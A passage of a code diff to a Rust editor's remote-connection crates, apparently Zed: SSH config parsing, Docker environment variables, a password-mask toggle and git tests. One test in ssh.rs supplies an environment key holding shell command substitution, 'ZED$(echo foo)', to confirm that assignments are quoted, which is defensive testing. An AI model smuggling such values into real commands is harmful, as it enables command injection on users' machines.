+fn parse_host_blocks(config: &str) -> Vec { + let mut blocks = Vec::new(); + let mut aliases = BTreeSet::new(); + let mut hostname = None; + let mut needs_continuation = false; + for line in config.lines() { let line = line.trim_start(); - if let Some(line) = line.strip_prefix("Host") { - match line.chars().next() { - Some('\\') => { - needs_another_line = true; - } - Some('\n' | '\r') => { - needs_another_line = false; - } - Some(c) if c.is_whitespace() => { - parse_hosts_from(line, &mut hosts); - } - Some(_) | None => { - needs_another_line = false; - } - }; - - if needs_another_line { - parse_hosts_from(line, &mut hosts); - needs_another_line = line.trim_end().ends_with('\\'); - } else { - needs_another_line = false; + + if needs_continuation { + needs_continuation = line.trim_end().ends_with('\\'); + parse_hosts(line, &mut aliases); + continue; + } + + let Some((keyword, value)) = split_keyword_and_value(line) else { + continue; + }; + + if keyword.eq_ignore_ascii_case("host") { + if !aliases.is_empty() { + blocks.push(HostBlock { aliases, hostname }); + aliases = BTreeSet::new(); + hostname = None; } - } else if needs_another_line { - needs_another_line = line.trim_end().ends_with('\\'); - parse_hosts_from(line, &mut hosts); - } else { - needs_another_line = false; + parse_hosts(value, &mut aliases); + needs_continuation = line.trim_end().ends_with('\\'); + } else if keyword.eq_ignore_ascii_case("hostname") { + hostname = value.split_whitespace().next().map(ToOwned::to_owned); } } - hosts + if !aliases.is_empty() { + blocks.push(HostBlock { aliases, hostname }); + } + + blocks } -fn parse_hosts_from(line: &str, hosts: &mut BTreeSet) { +fn parse_hosts(line: &str, hosts: &mut BTreeSet) { hosts.extend( line.split_whitespace() + .map(|field| field.trim_end_matches('\\')) .filter(|field| !field.starts_with("!")) .filter(|field| !field.contains("*")) + .filter(|field| *field != "\\") .filter(|field| !field.is_empty()) .map(|field| field.to_owned()), ); } +fn split_keyword_and_value(line: &str) -> Option<(&str, &str)> { + let keyword_end = line.find(char::is_whitespace).unwrap_or(line.len()); + let keyword = &line[..keyword_end]; + if keyword.is_empty() { + return None; + } + + let value = line[keyword_end..].trim_start(); + Some((keyword, value)) +} + +fn is_git_provider_domain(host: &str) -> bool { + let host = host.to_ascii_lowercase(); + FILTERED_GIT_PROVIDER_HOSTNAMES.contains(&host.as_str()) +} + #[cfg(test)] mod tests { use super::*; + use indoc::indoc; #[test] fn test_thank_you_bjorn3() { - let hosts = " + let hosts = indoc! {" Host * AddKeysToAgent yes UseKeychain yes @@ -67,19 +123,20 @@ mod tests { User not_me Host something - HostName whatever.tld + HostName whatever.tld - Host linux bsd host3 - User bjorn + Host linux bsd host3 + User bjorn - Host rpi - user rpi - hostname rpi.local + Host rpi + user rpi + hostname rpi.local - Host \ - somehost \ - anotherhost - Hostname 192.168.3.3"; + Host \\ + somehost \\ + anotherhost + Hostname 192.168.3.3 + "}; let expected_hosts = BTreeSet::from_iter([ "something".to_owned(), @@ -93,4 +150,68 @@ mod tests { assert_eq!(expected_hosts, parse_ssh_config_hosts(hosts)); } + + #[test] + fn filters_git_provider_domains_from_hostname() { + let hosts = indoc! {" + Host github-personal + HostName github.com + + Host gitlab-work + HostName GITLAB.COM + + Host local + HostName example.com + "}; + + assert_eq!( + BTreeSet::from_iter(["local".to_owned()]), + parse_ssh_config_hosts(hosts) + ); + } + + #[test] + fn falls_back_to_host_when_hostname_is_absent() { + let hosts = indoc! {" + Host github.com bitbucket.org keep-me + User git + "}; + + assert_eq!( + BTreeSet::from_iter(["keep-me".to_owned()]), + parse_ssh_config_hosts(hosts) + ); + } + + #[test] + fn does_not_fuzzy_match_host_aliases() { + let hosts = indoc! {" + Host GitHub GitLab Bitbucket GITHUB github + User git + "}; + + assert_eq!( + BTreeSet::from_iter([ + "Bitbucket".to_owned(), + "GITHUB".to_owned(), + "GitHub".to_owned(), + "GitLab".to_owned(), + "github".to_owned(), + ]), + parse_ssh_config_hosts(hosts) + ); + } + + #[test] + fn uses_hostname_before_host_filtering() { + let hosts = indoc! {" + Host github.com keep-me + HostName example.com + "}; + + assert_eq!( + BTreeSet::from_iter(["github.com".to_owned(), "keep-me".to_owned()]), + parse_ssh_config_hosts(hosts) + ); + } } diff --git a/crates/recent_projects/src/wsl_picker.rs b/crates/recent_projects/src/wsl_picker.rs index 7f2a69eb68cb93742d98f438f75f74c95bf3f7d5..c53dd7c3fb68bc087216764536506f85117ffb36 100644 --- a/crates/recent_projects/src/wsl_picker.rs +++ b/crates/recent_projects/src/wsl_picker.rs @@ -235,9 +235,6 @@ impl WslOpenModal { cx: &mut Context, ) { let app_state = workspace::AppState::global(cx); - let Some(app_state) = app_state.upgrade() else { - return; - }; let connection_options = RemoteConnectionOptions::Wsl(WslConnectionOptions { distro_name: distro.to_string(), @@ -248,14 +245,16 @@ impl WslOpenModal { true => secondary, false => !secondary, }; - let replace_window = match replace_current_window { - true => window.window_handle().downcast::(), - false => None, + let open_mode = if replace_current_window { + workspace::OpenMode::Activate + } else { + workspace::OpenMode::NewWindow }; let paths = self.paths.clone(); let open_options = workspace::OpenOptions { - replace_window, + requesting_window: window.window_handle().downcast::(), + open_mode, ..Default::default() }; diff --git a/crates/remote/Cargo.toml b/crates/remote/Cargo.toml index 50026904a8f1ae9bf1954b8c41383487f59a001b..c08561954ebc0ba47a7bf1ab58092275161679a0 100644 --- a/crates/remote/Cargo.toml +++ b/crates/remote/Cargo.toml @@ -48,3 +48,4 @@ which.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } +util = { workspace = true, features = ["test-support"] } diff --git a/crates/remote/src/remote_client.rs b/crates/remote/src/remote_client.rs index f31fc9ebec028b6a42a7cbc0d61cf9574a4a0f3c..c04d3630f92bcc27afb01a619176d3ae79d3fac7 100644 --- a/crates/remote/src/remote_client.rs +++ b/crates/remote/src/remote_client.rs @@ -1273,7 +1273,7 @@ impl ConnectionPool { } } -#[derive(Debug, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub enum RemoteConnectionOptions { Ssh(SshConnectionOptions), Wsl(WslConnectionOptions), @@ -1285,7 +1285,10 @@ pub enum RemoteConnectionOptions { impl RemoteConnectionOptions { pub fn display_name(&self) -> String { match self { - RemoteConnectionOptions::Ssh(opts) => opts.host.to_string(), + RemoteConnectionOptions::Ssh(opts) => opts + .nickname + .clone() + .unwrap_or_else(|| opts.host.to_string()), RemoteConnectionOptions::Wsl(opts) => opts.distro_name.clone(), RemoteConnectionOptions::Docker(opts) => { if opts.use_podman { @@ -1300,6 +1303,32 @@ impl RemoteConnectionOptions { } } +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_ssh_display_name_prefers_nickname() { + let options = RemoteConnectionOptions::Ssh(SshConnectionOptions { + host: "1.2.3.4".into(), + nickname: Some("My Cool Project".to_string()), + ..Default::default() + }); + + assert_eq!(options.display_name(), "My Cool Project"); + } + + #[test] + fn test_ssh_display_name_falls_back_to_host() { + let options = RemoteConnectionOptions::Ssh(SshConnectionOptions { + host: "1.2.3.4".into(), + ..Default::default() + }); + + assert_eq!(options.display_name(), "1.2.3.4"); + } +} + impl From for RemoteConnectionOptions { fn from(opts: SshConnectionOptions) -> Self { RemoteConnectionOptions::Ssh(opts) diff --git a/crates/remote/src/transport.rs b/crates/remote/src/transport.rs index 09bb22ddbe2b303b767255fd7ab02b54d9b17b2f..8d0f212cfc4f9544d0a827a41aefc3a8af07ee72 100644 --- a/crates/remote/src/transport.rs +++ b/crates/remote/src/transport.rs @@ -1,3 +1,5 @@ +use std::io::Write; + use crate::{ RemoteArch, RemoteOs, RemotePlatform, json_log::LogRecord, @@ -137,7 +139,12 @@ fn handle_rpc_messages_over_child_process_stdio( if let Ok(record) = serde_json::from_slice::(content) { record.log(log::logger()) } else { - eprintln!("(remote) {}", String::from_utf8_lossy(content)); + std::io::stderr() + .write_fmt(format_args!( + "(remote) {}\n", + String::from_utf8_lossy(content) + )) + .ok(); } } stderr_buffer.drain(0..start_ix); diff --git a/crates/remote/src/transport/docker.rs b/crates/remote/src/transport/docker.rs index 1bcf80880ab17ddea63bd56fb54acfddc48db2dd..6322cd9193d383cfcd3e9ff5cb93670bcd136023 100644 --- a/crates/remote/src/transport/docker.rs +++ b/crates/remote/src/transport/docker.rs @@ -6,6 +6,7 @@ use collections::HashMap; use parking_lot::Mutex; use release_channel::{AppCommitSha, AppVersion, ReleaseChannel}; use semver::Version as SemanticVersion; +use std::collections::BTreeMap; use std::time::Instant; use std::{ path::{Path, PathBuf}, @@ -29,13 +30,25 @@ use crate::{ transport::parse_platform, }; -#[derive(Debug, Default, Clone, PartialEq, Eq, Hash)] +#[derive( + Debug, + Default, + Clone, + PartialEq, + Eq, + Hash, + PartialOrd, + Ord, + serde::Serialize, + serde::Deserialize, +)] pub struct DockerConnectionOptions { pub name: String, pub container_id: String, pub remote_user: String, pub upload_binary_over_docker_exec: bool, pub use_podman: bool, + pub remote_env: BTreeMap, } pub(crate) struct DockerExecConnection { @@ -499,10 +512,14 @@ impl DockerExecConnection { args.push("-u".to_string()); args.push(self.connection_options.remote_user.clone()); + for (k, v) in self.connection_options.remote_env.iter() { + args.push("-e".to_string()); + args.push(format!("{k}={v}")); + } + for (k, v) in env.iter() { args.push("-e".to_string()); - let env_declaration = format!("{}={}", k, v); - args.push(env_declaration); + args.push(format!("{k}={v}")); } args.push(self.connection_options.container_id.clone()); @@ -632,10 +649,15 @@ impl RemoteConnection for DockerExecConnection { }; let mut docker_args = vec!["exec".to_string()]; + + for (k, v) in self.connection_options.remote_env.iter() { + docker_args.push("-e".to_string()); + docker_args.push(format!("{k}={v}")); + } for env_var in ["RUST_LOG", "RUST_BACKTRACE", "ZED_GENERATE_MINIDUMPS"] { if let Some(value) = std::env::var(env_var).ok() { docker_args.push("-e".to_string()); - docker_args.push(format!("{}='{}'", env_var, value)); + docker_args.push(format!("{env_var}={value}")); } } @@ -768,9 +790,14 @@ impl RemoteConnection for DockerExecConnection { docker_args.push(parsed_working_dir); } + for (k, v) in self.connection_options.remote_env.iter() { + docker_args.push("-e".to_string()); + docker_args.push(format!("{k}={v}")); + } + for (k, v) in env.iter() { docker_args.push("-e".to_string()); - docker_args.push(format!("{}={}", k, v)); + docker_args.push(format!("{k}={v}")); } match interactive { diff --git a/crates/remote/src/transport/mock.rs b/crates/remote/src/transport/mock.rs index 06e13196583fef9743e3f337bfe9cd9acf0efbca..f567d24eb122f72b4dbb79cdeb2c98c744f02da4 100644 --- a/crates/remote/src/transport/mock.rs +++ b/crates/remote/src/transport/mock.rs @@ -56,7 +56,7 @@ use std::{ use util::paths::{PathStyle, RemotePathBuf}; /// Unique identifier for a mock connection. -#[derive(Debug, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub struct MockConnectionOptions { pub id: u64, } diff --git a/crates/remote/src/transport/ssh.rs b/crates/remote/src/transport/ssh.rs index d27662dde3656de1e2434273bee554a168198371..1884ea43b6492efba91623eb1ab4c5a1ed4d3de1 100644 --- a/crates/remote/src/transport/ssh.rs +++ b/crates/remote/src/transport/ssh.rs @@ -45,7 +45,7 @@ pub(crate) struct SshRemoteConnection { _temp_dir: TempDir, } -#[derive(Debug, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub enum SshConnectionHost { IpAddr(IpAddr), Hostname(String), @@ -102,7 +102,7 @@ fn bracket_ipv6(host: &str) -> String { } } -#[derive(Debug, Default, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Default, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub struct SshConnectionOptions { pub host: SshConnectionHost, pub username: Option, @@ -463,7 +463,7 @@ impl RemoteConnection for SshRemoteConnection { let mut proxy_args = vec![]; for env_var in VARS { if let Some(value) = std::env::var(env_var).ok() { - proxy_args.push(format!("{}='{}'", env_var, value)); + proxy_args.push(format!("{env_var}={value}")); } } proxy_args.push(remote_binary_path.display(self.path_style()).into_owned()); @@ -1666,12 +1666,11 @@ fn build_command_posix( write!(exec, "exec env ")?; for (k, v) in input_env.iter() { - write!( - exec, - "{}={} ", - k, - ssh_shell_kind.try_quote(v).context("shell quoting")? - )?; + let assignment = format!("{k}={v}"); + let assignment = ssh_shell_kind + .try_quote(&assignment) + .context("shell quoting")?; + write!(exec, "{assignment} ")?; } if let Some(input_program) = input_program { @@ -1882,7 +1881,7 @@ mod tests { "-q", "-t", "user@host", - "cd \"$HOME/work\" && exec env INPUT_VA=val remote_program arg1 arg2" + "cd \"$HOME/work\" && exec env 'INPUT_VA=val' remote_program arg1 arg2" ] ); assert_eq!(command.env, env); @@ -1918,7 +1917,7 @@ mod tests { "-q", "-t", "user@host", - "cd && exec env INPUT_VA=val /bin/fish -l" + "cd && exec env 'INPUT_VA=val' /bin/fish -l" ] ); assert_eq!(command.env, env); @@ -1926,6 +1925,38 @@ mod tests { Ok(()) } + #[test] + fn test_build_command_quotes_env_assignment() -> Result<()> { + let mut input_env = HashMap::default(); + input_env.insert("ZED$(echo foo)".to_string(), "value".to_string()); + + let command = build_command_posix( + Some("remote_program".to_string()), + &[], + &input_env, + None, + None, + HashMap::default(), + PathStyle::Posix, + "/bin/bash", + ShellKind::Posix, + vec![], + "user@host", + Interactive::No, + )?; + + let remote_command = command + .args + .last() + .context("missing remote command argument")?; + assert!( + remote_command.contains("exec env 'ZED$(echo foo)=value' remote_program"), + "expected env assignment to be quoted, got: {remote_command}" + ); + + Ok(()) + } + #[test] fn scp_args_exclude_port_forward_flags() { let options = SshConnectionOptions { diff --git a/crates/remote/src/transport/wsl.rs b/crates/remote/src/transport/wsl.rs index 2eb2aea59abdbe24a3dae168d4399aaa59a9c6e3..1bbbaca2235c0bcf14c414a9419ab9dd92b4e814 100644 --- a/crates/remote/src/transport/wsl.rs +++ b/crates/remote/src/transport/wsl.rs @@ -28,7 +28,9 @@ use util::{ shell_builder::ShellBuilder, }; -#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Deserialize, schemars::JsonSchema)] +#[derive( + Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize, schemars::JsonSchema, +)] pub struct WslConnectionOptions { pub distro_name: String, pub user: Option, @@ -450,13 +452,10 @@ impl RemoteConnection for WslRemoteConnection { let mut exec = String::from("exec env "); - for (k, v) in env.iter() { - write!( - exec, - "{}={} ", - k, - shell_kind.try_quote(v).context("shell quoting")? - )?; + for (key, value) in env.iter() { + let assignment = format!("{key}={value}"); + let assignment = shell_kind.try_quote(&assignment).context("shell quoting")?; + write!(exec, "{assignment} ")?; } if let Some(program) = program { diff --git a/crates/remote_connection/Cargo.toml b/crates/remote_connection/Cargo.toml index 53e20eb5eb0708252a90819d37b38e214aa95d67..d3b37f6985bb0b47a1a1902fc5a856c2df974a60 100644 --- a/crates/remote_connection/Cargo.toml +++ b/crates/remote_connection/Cargo.toml @@ -28,7 +28,7 @@ release_channel.workspace = true remote.workspace = true semver.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true ui_input.workspace = true workspace.workspace = true \ No newline at end of file diff --git a/crates/remote_connection/src/remote_connection.rs b/crates/remote_connection/src/remote_connection.rs index d4df85d7b94b52c6f6bef0f052e515797b4f79c3..df6260d1c5b3cd1704bfe0ce6a8476bbc0f39670 100644 --- a/crates/remote_connection/src/remote_connection.rs +++ b/crates/remote_connection/src/remote_connection.rs @@ -13,10 +13,10 @@ use release_channel::ReleaseChannel; use remote::{ConnectionIdentifier, RemoteClient, RemoteConnectionOptions, RemotePlatform}; use semver::Version; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ - ActiveTheme, Color, CommonAnimationExt, Context, InteractiveElement, IntoElement, KeyBinding, - LabelCommon, ListItem, Styled, Window, prelude::*, + ActiveTheme, CommonAnimationExt, Context, InteractiveElement, KeyBinding, ListItem, Tooltip, + prelude::*, }; use ui_input::{ERASED_EDITOR_FACTORY, ErasedEditor}; use workspace::{DismissDecision, ModalView}; @@ -30,6 +30,8 @@ pub struct RemoteConnectionPrompt { prompt: Option<(Entity, oneshot::Sender)>, cancellation: Option>, editor: Arc, + is_password_prompt: bool, + is_masked: bool, } impl Drop for RemoteConnectionPrompt { @@ -70,6 +72,8 @@ impl RemoteConnectionPrompt { status_message: None, cancellation: None, prompt: None, + is_password_prompt: false, + is_masked: true, } } @@ -85,7 +89,9 @@ impl RemoteConnectionPrompt { cx: &mut Context, ) { let is_yes_no = prompt.contains("yes/no"); - self.editor.set_masked(!is_yes_no, window, cx); + self.is_password_prompt = !is_yes_no; + self.is_masked = !is_yes_no; + self.editor.set_masked(self.is_masked, window, cx); let markdown = cx.new(|cx| Markdown::new_text(prompt.into(), cx)); self.prompt = Some((markdown, tx)); @@ -133,40 +139,87 @@ impl Render for RemoteConnectionPrompt { ..Default::default() }; + let is_password_prompt = self.is_password_prompt; + let is_masked = self.is_masked; + let (masked_password_icon, masked_password_tooltip) = if is_masked { + (IconName::Eye, "Toggle to Unmask Password") + } else { + (IconName::EyeOff, "Toggle to Mask Password") + }; + v_flex() .key_context("PasswordPrompt") .p_2() .size_full() - .text_buffer(cx) - .when_some(self.status_message.clone(), |el, status_message| { - el.child( + .when_some(self.prompt.as_ref(), |this, prompt| { + this.child( + v_flex() + .text_sm() + .size_full() + .overflow_hidden() + .child( + h_flex() + .w_full() + .justify_between() + .child(MarkdownElement::new(prompt.0.clone(), markdown_style)) + .when(is_password_prompt, |this| { + this.child( + IconButton::new("toggle_mask", masked_password_icon) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text(masked_password_tooltip)) + .on_click(cx.listener(|this, _, window, cx| { + this.is_masked = !this.is_masked; + this.editor.set_masked(this.is_masked, window, cx); + window.focus(&this.editor.focus_handle(cx), cx); + cx.notify(); + })), + ) + }), + ) + .child(div().flex_1().child(self.editor.render(window, cx))), + ) + .when(window.capslock().on, |this| { + this.child( + h_flex() + .py_0p5() + .min_w_0() + .w_full() + .gap_1() + .child( + Icon::new(IconName::Warning) + .size(IconSize::Small) + .color(Color::Muted), + ) + .child( + Label::new("Caps lock is on.") + .size(LabelSize::Small) + .color(Color::Muted), + ), + ) + }) + }) + .when_some(self.status_message.clone(), |this, status_message| { + this.child( h_flex() - .gap_2() + .min_w_0() + .w_full() + .mt_1() + .gap_1() .child( - Icon::new(IconName::ArrowCircle) + Icon::new(IconName::LoadCircle) + .size(IconSize::Small) .color(Color::Muted) .with_rotate_animation(2), ) .child( - div() - .text_ellipsis() - .overflow_x_hidden() - .child(format!("{}…", status_message)), + Label::new(format!("{}…", status_message)) + .size(LabelSize::Small) + .color(Color::Muted) + .truncate() + .flex_1(), ), ) }) - .when_some(self.prompt.as_ref(), |el, prompt| { - el.child( - div() - .size_full() - .overflow_hidden() - .child(MarkdownElement::new(prompt.0.clone(), markdown_style)) - .child(self.editor.render(window, cx)), - ) - .when(window.capslock().on, |el| { - el.child(Label::new("⚠️ ⇪ is on")) - }) - }) } } diff --git a/crates/remote_server/Cargo.toml b/crates/remote_server/Cargo.toml index ee729a80eaa9eff56eee7f3bcb8fe6eaf31f0c41..c6ce45ba1ce28386d0776eb40299919f92aa8e53 100644 --- a/crates/remote_server/Cargo.toml +++ b/crates/remote_server/Cargo.toml @@ -89,9 +89,7 @@ action_log.workspace = true agent = { workspace = true, features = ["test-support"] } client = { workspace = true, features = ["test-support"] } clock = { workspace = true, features = ["test-support"] } -dap = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } -workspace = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } http_client = { workspace = true, features = ["test-support"] } @@ -100,10 +98,10 @@ node_runtime = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } remote = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true theme = { workspace = true, features = ["test-support"] } language_model = { workspace = true, features = ["test-support"] } lsp = { workspace = true, features = ["test-support"] } -prompt_store.workspace = true unindent.workspace = true serde_json.workspace = true zlog.workspace = true diff --git a/crates/remote_server/src/headless_project.rs b/crates/remote_server/src/headless_project.rs index ac6be6d413c08a73b1aa872b1f5acef6931d9c12..7bdbbad796bd2ced34ed7ccab690555457a0842b 100644 --- a/crates/remote_server/src/headless_project.rs +++ b/crates/remote_server/src/headless_project.rs @@ -129,7 +129,6 @@ impl HeadlessProject { worktree_store.clone(), environment.clone(), manifest_tree.clone(), - fs.clone(), cx, ) }); @@ -192,6 +191,7 @@ impl HeadlessProject { worktree_store.clone(), toolchain_store.read(cx).as_language_toolchain_store(), environment.clone(), + git_store.clone(), cx, ); task_store.shared(REMOTE_SERVER_PROJECT_ID, session.clone(), cx); diff --git a/crates/remote_server/src/remote_editing_tests.rs b/crates/remote_server/src/remote_editing_tests.rs index 778f7292d2a032df6995169852deeecee6fa76a7..f0f23577d31075ab815d6dba1cdbdccd275c184a 100644 --- a/crates/remote_server/src/remote_editing_tests.rs +++ b/crates/remote_server/src/remote_editing_tests.rs @@ -2,23 +2,21 @@ /// The tests in this file assume that server_cx is running on Windows too. /// We neead to find a way to test Windows-Non-Windows interactions. use crate::headless_project::HeadlessProject; -use agent::{ - AgentTool, ReadFileTool, ReadFileToolInput, Templates, Thread, ToolCallEventStream, ToolInput, -}; +use agent::{AgentTool, ReadFileTool, ReadFileToolInput, ToolCallEventStream, ToolInput}; use client::{Client, UserStore}; use clock::FakeSystemClock; use collections::{HashMap, HashSet}; -use git::repository::DiffType; -use language_model::{LanguageModelToolResultContent, fake_provider::FakeLanguageModel}; -use prompt_store::ProjectContext; +use language_model::LanguageModelToolResultContent; +use languages::rust_lang; use extension::ExtensionHostProxy; use fs::{FakeFs, Fs}; +use git::repository::Worktree as GitWorktree; use gpui::{AppContext as _, Entity, SharedString, TestAppContext}; use http_client::{BlockedHttpClient, FakeHttpClient}; use language::{ Buffer, FakeLspAdapter, LanguageConfig, LanguageMatcher, LanguageRegistry, LineEnding, - language_settings::{AllLanguageSettings, language_settings}, + language_settings::{AllLanguageSettings, LanguageSettings}, }; use lsp::{ CompletionContext, CompletionResponse, CompletionTriggerKind, DEFAULT_LSP_REQUEST_TIMEOUT, @@ -485,6 +483,7 @@ async fn test_remote_settings(cx: &mut TestAppContext, server_cx: &mut TestAppCo let worktree_id = project .update(cx, |project, cx| { + project.languages().add(rust_lang()); project.find_or_create_worktree("/code/project1", true, cx) }) .await @@ -525,9 +524,8 @@ async fn test_remote_settings(cx: &mut TestAppContext, server_cx: &mut TestAppCo }); cx.read(|cx| { - let file = buffer.read(cx).file(); assert_eq!( - language_settings(Some("Rust".into()), file, cx).language_servers, + LanguageSettings::for_buffer(buffer.read(cx), cx).language_servers, ["override-rust-analyzer".to_string()] ) }); @@ -650,6 +648,7 @@ async fn test_remote_lsp(cx: &mut TestAppContext, server_cx: &mut TestAppContext let worktree_id = project .update(cx, |project, cx| { + project.languages().add(rust_lang()); project.find_or_create_worktree(path!("/code/project1"), true, cx) }) .await @@ -672,9 +671,8 @@ async fn test_remote_lsp(cx: &mut TestAppContext, server_cx: &mut TestAppContext let fake_second_lsp = fake_second_lsp.next().await.unwrap(); cx.read(|cx| { - let file = buffer.read(cx).file(); assert_eq!( - language_settings(Some("Rust".into()), file, cx).language_servers, + LanguageSettings::for_buffer(buffer.read(cx), cx).language_servers, ["rust-analyzer".to_string(), "fake-analyzer".to_string()] ) }); @@ -1542,6 +1540,87 @@ async fn test_copy_file_into_remote_project( ); } +#[gpui::test] +async fn test_remote_root_repo_common_dir(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { + let fs = FakeFs::new(server_cx.executor()); + fs.insert_tree( + "/code", + json!({ + "main_repo": { + ".git": {}, + "file.txt": "content", + }, + "no_git": { + "file.txt": "content", + }, + }), + ) + .await; + + // Create a linked worktree that points back to main_repo's .git. + fs.add_linked_worktree_for_repo( + Path::new("/code/main_repo/.git"), + false, + GitWorktree { + path: PathBuf::from("/code/linked_worktree"), + ref_name: Some("refs/heads/feature-branch".into()), + sha: "abc123".into(), + is_main: false, + }, + ) + .await; + + let (project, _headless) = init_test(&fs, cx, server_cx).await; + + // Main repo: root_repo_common_dir should be the .git directory itself. + let (worktree_main, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/code/main_repo", true, cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let common_dir = worktree_main.read_with(cx, |worktree, _| { + worktree.snapshot().root_repo_common_dir().cloned() + }); + assert_eq!( + common_dir.as_deref(), + Some(Path::new("/code/main_repo/.git")), + ); + + // Linked worktree: root_repo_common_dir should point to the main repo's .git. + let (worktree_linked, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/code/linked_worktree", true, cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let common_dir = worktree_linked.read_with(cx, |worktree, _| { + worktree.snapshot().root_repo_common_dir().cloned() + }); + assert_eq!( + common_dir.as_deref(), + Some(Path::new("/code/main_repo/.git")), + ); + + // No git repo: root_repo_common_dir should be None. + let (worktree_no_git, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/code/no_git", true, cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let common_dir = worktree_no_git.read_with(cx, |worktree, _| { + worktree.snapshot().root_repo_common_dir().cloned() + }); + assert_eq!(common_dir, None); +} + #[gpui::test] async fn test_remote_git_diffs(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { let text_2 = " @@ -1664,7 +1743,7 @@ async fn test_remote_git_diffs_when_recv_update_repository_delay( cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); release_channel::init(semver::Version::new(0, 0, 0), cx); editor::init(cx); }); @@ -1921,44 +2000,21 @@ async fn test_remote_git_branches(cx: &mut TestAppContext, server_cx: &mut TestA } #[gpui::test] -async fn test_remote_git_diff_stat(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { +async fn test_remote_git_checkpoints(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { let fs = FakeFs::new(server_cx.executor()); fs.insert_tree( path!("/code"), json!({ "project1": { ".git": {}, - "src": { - "lib.rs": "line1\nline2\nline3\n", - "new_file.rs": "added1\nadded2\n", - }, - "README.md": "# project 1", + "file.txt": "original content", }, }), ) .await; - let dot_git = Path::new(path!("/code/project1/.git")); - - // HEAD: lib.rs (2 lines), deleted.rs (1 line) - fs.set_head_for_repo( - dot_git, - &[ - ("src/lib.rs", "line1\nold_line2\n".into()), - ("src/deleted.rs", "was_here\n".into()), - ], - "deadbeef", - ); - // Index: lib.rs modified (4 lines), staged_only.rs new (2 lines) - fs.set_index_for_repo( - dot_git, - &[ - ("src/lib.rs", "line1\nold_line2\nline3\nline4\n".into()), - ("src/staged_only.rs", "x\ny\n".into()), - ], - ); - let (project, _headless) = init_test(&fs, cx, server_cx).await; + let (_worktree, _) = project .update(cx, |project, cx| { project.find_or_create_worktree(path!("/code/project1"), true, cx) @@ -1967,80 +2023,127 @@ async fn test_remote_git_diff_stat(cx: &mut TestAppContext, server_cx: &mut Test .unwrap(); cx.run_until_parked(); - let repo_path = |s: &str| git::repository::RepoPath::new(s).unwrap(); - let repository = project.update(cx, |project, cx| project.active_repository(cx).unwrap()); - // --- HeadToWorktree --- - let stats = cx - .update(|cx| repository.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToWorktree, cx))) + // 1. Create a checkpoint of the original state + let checkpoint_1 = repository + .update(cx, |repository, _| repository.checkpoint()) .await .unwrap() .unwrap(); - // src/lib.rs: worktree 3 lines vs HEAD 2 lines - let stat = stats.get(&repo_path("src/lib.rs")).expect("src/lib.rs"); - assert_eq!((stat.added, stat.deleted), (3, 2)); - - // src/new_file.rs: only in worktree (2 lines) - let stat = stats - .get(&repo_path("src/new_file.rs")) - .expect("src/new_file.rs"); - assert_eq!((stat.added, stat.deleted), (2, 0)); + // 2. Modify a file on the server-side fs + fs.write( + Path::new(path!("/code/project1/file.txt")), + b"modified content", + ) + .await + .unwrap(); - // src/deleted.rs: only in HEAD (1 line) - let stat = stats - .get(&repo_path("src/deleted.rs")) - .expect("src/deleted.rs"); - assert_eq!((stat.added, stat.deleted), (0, 1)); + // 3. Create a second checkpoint with the modified state + let checkpoint_2 = repository + .update(cx, |repository, _| repository.checkpoint()) + .await + .unwrap() + .unwrap(); - // README.md: only in worktree (1 line) - let stat = stats.get(&repo_path("README.md")).expect("README.md"); - assert_eq!((stat.added, stat.deleted), (1, 0)); + // 4. compare_checkpoints: same checkpoint with itself => equal + let equal = repository + .update(cx, |repository, _| { + repository.compare_checkpoints(checkpoint_1.clone(), checkpoint_1.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!(equal, "a checkpoint compared with itself should be equal"); - // --- HeadToIndex --- - let stats = cx - .update(|cx| repository.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToIndex, cx))) + // 5. compare_checkpoints: different states => not equal + let equal = repository + .update(cx, |repository, _| { + repository.compare_checkpoints(checkpoint_1.clone(), checkpoint_2.clone()) + }) .await .unwrap() .unwrap(); + assert!( + !equal, + "checkpoints of different states should not be equal" + ); - // src/lib.rs: index 4 lines vs HEAD 2 lines - let stat = stats.get(&repo_path("src/lib.rs")).expect("src/lib.rs"); - assert_eq!((stat.added, stat.deleted), (4, 2)); - - // src/staged_only.rs: only in index (2 lines) - let stat = stats - .get(&repo_path("src/staged_only.rs")) - .expect("src/staged_only.rs"); - assert_eq!((stat.added, stat.deleted), (2, 0)); - - // src/deleted.rs: in HEAD but not in index - let stat = stats - .get(&repo_path("src/deleted.rs")) 